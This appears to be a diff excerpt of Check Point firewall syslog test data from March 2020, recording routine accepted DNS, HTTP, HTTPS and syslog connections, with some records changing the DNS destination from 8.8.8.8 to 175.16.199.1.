src:"192.168.1.117"] <134>1 2020-03-29T22:23:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fe1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52119"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T22:23:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fe5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520613"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58319"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:23:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fe5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520613"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58319"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59638"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44284"; 
service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10674"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49371"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39524"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10675"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x4,0x353707c7,0xee78a1dc}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57464"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59608"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10676"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T22:23:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520623"; 
layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57332"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:23:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520623"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57332"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ff0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52120"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:23:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; 
loguid:"{0x5e811ff0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52121"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:23:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ff1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52122"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:23:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ff1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52123"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T22:23:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ff9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520633"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45470"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:24:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812003,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520643"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46191"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:24:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81200d,0x0,0x353707c7,0xee78a1dc}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520653"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52696"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:23:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ff9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520633"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45470"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:24:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812003,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520643"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46191"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:24:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81200d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520653"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52696"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:24:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81200f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T22:24:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812017,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520663"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49680"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:24:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812021,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520673"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:24:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812017,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520663"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49680"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:24:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812021,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520673"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812043,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52124"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812043,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52125"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812045,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] 
@@ -6531,9 +6531,9 @@
 <134>1 2020-03-29T22:53:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8126fe,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60412"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10743"; xlatesrc:"0.0.0.0"]
